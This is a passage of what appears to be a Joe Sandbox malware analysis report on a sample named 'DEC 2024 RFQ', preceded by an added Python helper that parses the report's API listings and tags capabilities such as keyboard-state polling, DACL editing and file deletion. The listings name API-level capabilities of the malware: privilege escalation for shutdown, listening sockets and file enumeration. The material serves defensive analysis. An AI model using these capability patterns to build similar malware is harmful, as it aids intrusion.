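The function entries above (the DACL-editing routine, the keyboard-state poller, the RegConnectRegistryW reader, the clipboard function and the FindFirstFileW/DeleteFileW/MoveFileW loop) are raw IDA-plugin output with no interpretation attached. As an added example that is not part of the Joe Sandbox report, the Python below parses such "APIs" blocks, decodes the virtual-key constants handed to GetAsyncKeyState/GetKeyState, and tags each function with the capability its direct calls imply. The capability table, the VK name map and the classification thresholds are this example's own assumptions; the two sample blocks are copied from this report's keyboard-state and DACL entries and are labelled as constructed input.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not report output)."""
import re
from typing import Dict, List

# Matches the API lines of an "APIs" block, e.g.
#   • GetAsyncKeyState.USER32(000000A0), ref: 00080122
#   • Part of subcall function 00078202: HeapAlloc.KERNEL32(00000000,?), ref: 0007823E
#   • _memset.LIBCMT ref: 00077D28
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Virtual-key codes seen as GetAsyncKeyState/GetKeyState arguments (Win32 winuser.h values).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}
MODIFIER_VKS = set(VK_NAMES)

# Assumed capability tags, keyed on the APIs a function calls directly (not via subcalls).
CAPABILITIES = {
    "keyboard_state": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState", "SetKeyboardState"},
    "clipboard": {"OpenClipboard", "GetClipboardData", "EmptyClipboard", "SetClipboardData"},
    "registry_read": {"RegConnectRegistryW", "RegOpenKeyExW", "RegQueryValueExW"},
    "dacl_modify": {"SetUserObjectSecurity", "SetSecurityDescriptorDacl", "AddAce"},
    "file_enum_delete": {"FindFirstFileW", "FindNextFileW", "DeleteFileW", "MoveFileW"},
}


def parse_api_block(text: str) -> List[Dict]:
    """Turn one APIs block into call records; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                      "ref": int(m.group("ref"), 16), "subcall": m.group("sub") is not None})
    return calls


def classify(calls: List[Dict]) -> List[str]:
    """Capability tags judged on the function's own calls, not on helpers it calls into."""
    direct = {c["api"] for c in calls if not c["subcall"]}
    return sorted(tag for tag, apis in CAPABILITIES.items() if direct & apis)


def _polled_vks(calls: List[Dict]) -> List[int]:
    return [int(c["args"][0], 16) for c in calls
            if c["api"] in ("GetAsyncKeyState", "GetKeyState") and c["args"] and c["args"][0] != "?"]


def polled_keys(calls: List[Dict]) -> List[str]:
    """Distinct virtual keys polled, decoded by name where the map knows them."""
    return sorted({VK_NAMES.get(vk, f"VK_0x{vk:02X}") for vk in _polled_vks(calls)})


def keylogger_likelihood(calls: List[Dict]) -> str:
    """'none' if no keys are polled; 'modifier-only' if every polled key is a modifier
    (what a key-simulation routine does to save and restore modifier state);
    'broad' if non-modifier keys are polled, which logging typed text requires."""
    vks = _polled_vks(calls)
    if not vks:
        return "none"
    return "modifier-only" if all(v in MODIFIER_VKS for v in vks) else "broad"


# Constructed sample: the keyboard-state function from this report, offsets as listed.
KEYBOARD_BLOCK = """
• GetKeyboardState.USER32(?), ref: 00080097
• SetKeyboardState.USER32(?), ref: 00080102
• GetAsyncKeyState.USER32(000000A0), ref: 00080122
• GetKeyState.USER32(000000A0), ref: 00080139
• GetAsyncKeyState.USER32(000000A1), ref: 00080168
• GetKeyState.USER32(000000A1), ref: 00080179
• GetAsyncKeyState.USER32(00000011), ref: 000801A5
• GetKeyState.USER32(00000011), ref: 000801B3
• GetAsyncKeyState.USER32(00000012), ref: 000801DC
• GetKeyState.USER32(00000012), ref: 000801EA
• GetAsyncKeyState.USER32(0000005B), ref: 00080213
• GetKeyState.USER32(0000005B), ref: 00080221
"""

# Constructed sample: a subset of the DACL-editing function, including subcall lines.
DACL_BLOCK = """
  • Part of subcall function 00078202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0007821E
  • Part of subcall function 0007829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00077CF8,?), ref: 000782C3
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00077D13
• _memset.LIBCMT ref: 00077D28
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00077DB1
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00077E63
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00077E77
"""

if __name__ == "__main__":
    for name, block in (("keyboard", KEYBOARD_BLOCK), ("dacl", DACL_BLOCK)):
        calls = parse_api_block(block)
        print(name, classify(calls), polled_keys(calls), keylogger_likelihood(calls))
```

Run against the keyboard entry, the parser resolves the polled keys to VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN only. Polling just the modifiers alongside GetKeyboardState/SetKeyboardState is the shape of a routine that saves and restores modifier state around synthetic input, not of one that records what the user types, which would have to poll or hook the printable range; the report's keystroke-logging signature is attributed to the .NET source, so that is where a practitioner should look for the capture logic. The DACL entry tags as dacl_modify because AddAce, SetSecurityDescriptorDacl and SetUserObjectSecurity are direct calls, while the GetUserObjectSecurity and InitializeSecurityDescriptor lines are subcalls and are deliberately not counted toward the tag.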
APIs
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0008F440
• Sleep.KERNEL32(0000000A), ref: 0008F470
• _wcscmp.LIBCMT ref: 0008F484
• _wcscmp.LIBCMT ref: 0008F49F
• FindNextFileW.KERNEL32(?,?), ref: 0008F53D
• FindClose.KERNEL32(00000000), ref: 0008F553
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
  • Part of subcall function 00084A31: GetFileAttributesW.KERNEL32(?,0008370B), ref: 00084A32
• FindFirstFileW.KERNEL32(?,?), ref: 00083B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00083BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00083BEA
• FindClose.KERNEL32(00000000), ref: 00083C01
• FindClose.KERNEL32(00000000), ref: 00083C0A
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
  • Part of subcall function 000787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0007882B
  • Part of subcall function 000787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00078858
  • Part of subcall function 000787E1: GetLastError.KERNEL32 ref: 00078865
• ExitWindowsEx.USER32(?,00000000), ref: 000851F9
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000962DC
• WSAGetLastError.WSOCK32(00000000), ref: 000962EB
• bind.WSOCK32(00000000,?,00000010), ref: 00096307
• listen.WSOCK32(00000000,00000005), ref: 00096316
• WSAGetLastError.WSOCK32(00000000), ref: 00096330
• closesocket.WSOCK32(00000000,00000000), ref: 00096344
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
  • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
  • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
• _memmove.LIBCMT ref: 00070258
• _memmove.LIBCMT ref: 0007036D
• _memmove.LIBCMT ref: 00070414
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
APIs
  • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 000219FA
• GetSysColor.USER32(0000000F), ref: 00021A4E
• SetBkColor.GDI32(?,00000000), ref: 00021A61
  • Part of subcall function 00021290: DefDlgProcW.USER32(?,00000020,?), ref: 000212D8
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0008BCE6
• _wcscmp.LIBCMT ref: 0008BD16
• _wcscmp.LIBCMT ref: 0008BD2B
• FindNextFileW.KERNEL32(00000000,?), ref: 0008BD3C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0008BD6C
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2387731787-0
                                                                                                                      • Opcode ID: 6a02abe7c10c6a39f93d42e144f82f04f73b41ae9f80db9ac2b055207f2c0d45
                                                                                                                      • Instruction ID: c99c601d5a7d00e22320d9827eefeefc6d22b4ebc39321b03c9231c0880ada1c
                                                                                                                      • Opcode Fuzzy Hash: 6a02abe7c10c6a39f93d42e144f82f04f73b41ae9f80db9ac2b055207f2c0d45
                                                                                                                      • Instruction Fuzzy Hash: 9F518075604702AFD714EF68D490EAAB7E4FF49320F14461DE996873A2DB30ED04CB91
APIs
  • Part of subcall function 00097D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00097DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0009679E
• WSAGetLastError.WSOCK32(00000000), ref: 000967C7
• bind.WSOCK32(00000000,?,00000010), ref: 00096800
• WSAGetLastError.WSOCK32(00000000), ref: 0009680D
• closesocket.WSOCK32(00000000,00000000), ref: 00096821
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: d023fa1ecd2293157047bf9ec72d4ec7bcc48c1409567f427c2293b000a96079
• Instruction ID: 94628961fd1c47382d30c9c30a21fb341ca0def16d1c90b85ba0b4c207935507
• Opcode Fuzzy Hash: d023fa1ecd2293157047bf9ec72d4ec7bcc48c1409567f427c2293b000a96079
• Instruction Fuzzy Hash: 6141D375A00620AFEB10AF649C86FBE77E8EF05714F448458F91AAB3C3CE749D008791
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: dc32d44c89b09743c67a4f643018e4e34b6bfdbae32d38db8ba5e1921d4f45a4
• Instruction ID: 2b501e8f756719b1b21da0836ba5dfbf399276524868250c342b2f569149047c
• Opcode Fuzzy Hash: dc32d44c89b09743c67a4f643018e4e34b6bfdbae32d38db8ba5e1921d4f45a4
• Instruction Fuzzy Hash: FD11E732700D226FEB215FA6DC44A6E7BD8FF867A2B444439F946D7242CB74DD01C6A4
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000780C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000780CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000780D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000780E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000780F6
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: ebbf5fa743ef212972cde5b95ecd14def45c38778a82ea125df61f5134e344e5
• Instruction ID: fb8e7c6b0ec783d0d6567596a800b011d01160572130fc20de34e6582858d3a0
• Opcode Fuzzy Hash: ebbf5fa743ef212972cde5b95ecd14def45c38778a82ea125df61f5134e344e5
• Instruction Fuzzy Hash: 19F06231240605AFEB501FA5EC8DE773BACEF4A755B408025F949C6150CB699D41DB60
APIs
• CoInitialize.OLE32(00000000), ref: 0008C432
• CoCreateInstance.OLE32(000B2D6C,00000000,00000001,000B2BDC,?), ref: 0008C44A
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
• CoUninitialize.OLE32 ref: 0008C6B7
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
• Opcode ID: b6152db4b2b1317d92b9cab5610d21835b98e0bdcda0dbdf77dafe275001e754
• Instruction ID: 4813ded817d9df2a28d1e712052eaf1dedc4b70880f17200b6a6dad56a2ecf32
• Opcode Fuzzy Hash: b6152db4b2b1317d92b9cab5610d21835b98e0bdcda0dbdf77dafe275001e754
• Instruction Fuzzy Hash: 1DA15B71104205AFD700EF54D881EAFB7E8FF85354F00492DF5999B1A2EB71EA49CB62
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00024AD0), ref: 00024B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00024B57
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 2d25f4033b67f2bf4f6a7e3d7151395e1260d083ec9849dfd4be177f45935d7e
• Instruction ID: f1e44243d92c61d453254cbce1811e52396188dd9bff2acf978cd924e85a4689
• Opcode Fuzzy Hash: 2d25f4033b67f2bf4f6a7e3d7151395e1260d083ec9849dfd4be177f45935d7e
• Instruction Fuzzy Hash: 1AD05B34A10723CFD7209FF1EC68B5676E8AF06391B11C83DD4C6D6150D774D480CA64
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
• Opcode ID: 1b9ecb661ede1a2a48c47d56961e8c5ffdb9573fc79e0aa400ded22f961e00d3
• Instruction ID: 0fc57bfcd17915c431767d08657c67710728c43bb348b948d02edd3fa3353b2e
• Opcode Fuzzy Hash: 1b9ecb661ede1a2a48c47d56961e8c5ffdb9573fc79e0aa400ded22f961e00d3
• Instruction Fuzzy Hash: F022B0716083119FC725DF14D891BAFB7E9BF84310F04492DF89A97292DB71EA44CB92
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0009EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0009EE4B
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
• Process32NextW.KERNEL32(00000000,?), ref: 0009EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0009EF1A
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: 0dc18cc320b4ebc1a767584cb57ad33a0a4ffe449fbc5e1432227ea07f1dfcb7
• Instruction ID: 5a0a325e167e148fa2c5bae93b4963132e522d739f40e8250fc508ce74b90f27
• Opcode Fuzzy Hash: 0dc18cc320b4ebc1a767584cb57ad33a0a4ffe449fbc5e1432227ea07f1dfcb7
• Instruction Fuzzy Hash: 2D518E71504711AFD710EF20DC85EABB7E8EF94710F50482DF995972A2EB70A908CB92
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
• Opcode ID: 84255cf0831d290384748188607314cb73c4b40b5f71da565cfd71f7aa836b09
• Instruction ID: 6aa70b618c392eb555a9e88903b1695d3498942b2c8ec8b3bac37b317bfd2a28
• Opcode Fuzzy Hash: 84255cf0831d290384748188607314cb73c4b40b5f71da565cfd71f7aa836b09
• Instruction Fuzzy Hash: 6992AA70A083418FD765DF24C490B6BBBE9BF85304F14896DE88A9B362D771EC45CB92
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0007E628
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: 80ff450e0d840d7471e8fd7c4a178e967e134f718942914b3b08af9ba4383aae
                                                                                                                      • Instruction ID: 9f7dfd64103e9a545fa1cb2a7257e138d48870fb22b838c8546882ce73c1bc74
                                                                                                                      • Opcode Fuzzy Hash: 80ff450e0d840d7471e8fd7c4a178e967e134f718942914b3b08af9ba4383aae
                                                                                                                      • Instruction Fuzzy Hash: 5B323675A017059FD728CF29C4819AAB7F0FF48310B15C4AEE99ADB3A2E774E941CB44
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0009180A,00000000), ref: 000923E1
                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00092418
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 599397726-0
                                                                                                                      • Opcode ID: 0085386f35c5c1927dc16bfb9974916012c9f9a7d56aa1b8fc5ea768c91eabf1
                                                                                                                      • Instruction ID: 4cb787090e03446dc1e8eda3981dd5b7867c432be074384d81a11863bbd2abae
                                                                                                                      • Opcode Fuzzy Hash: 0085386f35c5c1927dc16bfb9974916012c9f9a7d56aa1b8fc5ea768c91eabf1
                                                                                                                      • Instruction Fuzzy Hash: FE41C3B1904209BFEF20DE95DC85FBFB7FCEB40314F10806AF641A6141EA759E41AA64
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008B343
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0008B39D
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0008B3EA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: 544ba3ee2376b8146dd37750b2975d72fff700d5cf24d1a5ed6058d20bdca242
                                                                                                                      • Instruction ID: 18bcef262a60bc38f6900bef8e5754e6812a200e972573a736ad2718f41a8e32
                                                                                                                      • Opcode Fuzzy Hash: 544ba3ee2376b8146dd37750b2975d72fff700d5cf24d1a5ed6058d20bdca242
                                                                                                                      • Instruction Fuzzy Hash: 45217135A00518EFDB00EFA5D881AEEBBB8FF49310F1480AAE945AB352CB319915CB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                        • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0007882B
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00078858
                                                                                                                      • GetLastError.KERNEL32 ref: 00078865
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1922334811-0
                                                                                                                      • Opcode ID: eb1eadaaaf86748b7bddcfe6ac107131a4bb8b87be6a3e98f05fc54ad1157b92
                                                                                                                      • Instruction ID: 4ffa9e954f185ea6df1e2d6d7f423ca83e1d27690a9c76c452009ebc804706c9
                                                                                                                      • Opcode Fuzzy Hash: eb1eadaaaf86748b7bddcfe6ac107131a4bb8b87be6a3e98f05fc54ad1157b92
                                                                                                                      • Instruction Fuzzy Hash: DB116DB2814205AFE718DFA4DC89D6BB7F8EB45711B20C52EE45997241EE34BC418B64
                                                                                                                      APIs
                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00078774
                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0007878B
                                                                                                                      • FreeSid.ADVAPI32(?), ref: 0007879B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429775523-0
                                                                                                                      • Opcode ID: a0722ab54917a20cfa07e1e4a95b63b5e5a3cec17763dd8736f468535abd2f0b
                                                                                                                      • Instruction ID: 9f8489539195e361902b4359a18f9474371fa2cbdaba843524bc1ce7e223cf93
                                                                                                                      • Opcode Fuzzy Hash: a0722ab54917a20cfa07e1e4a95b63b5e5a3cec17763dd8736f468535abd2f0b
                                                                                                                      • Instruction Fuzzy Hash: 39F04F7595130DBFEF04DFF4DC89EBEB7BCEF08201F108469A501E2181E6755A048B50
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0008C6FB
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008C72B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: 09a3dc45af40b52c50e864a34dbaed48402ab4aa778e00776fa1df0003a9fb73
                                                                                                                      • Instruction ID: 8d46a50f478b06352c1e3060a51ae67dbf547b0043af3fa86c788a36397e17d3
                                                                                                                      • Opcode Fuzzy Hash: 09a3dc45af40b52c50e864a34dbaed48402ab4aa778e00776fa1df0003a9fb73
                                                                                                                      • Instruction Fuzzy Hash: 0111A1726006009FDB10EF29D845A6AF7E8FF85320F04851EF8AAC7291DB34AC01CF91
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00099468,?,000AFB84,?), ref: 0008A097
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00099468,?,000AFB84,?), ref: 0008A0A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
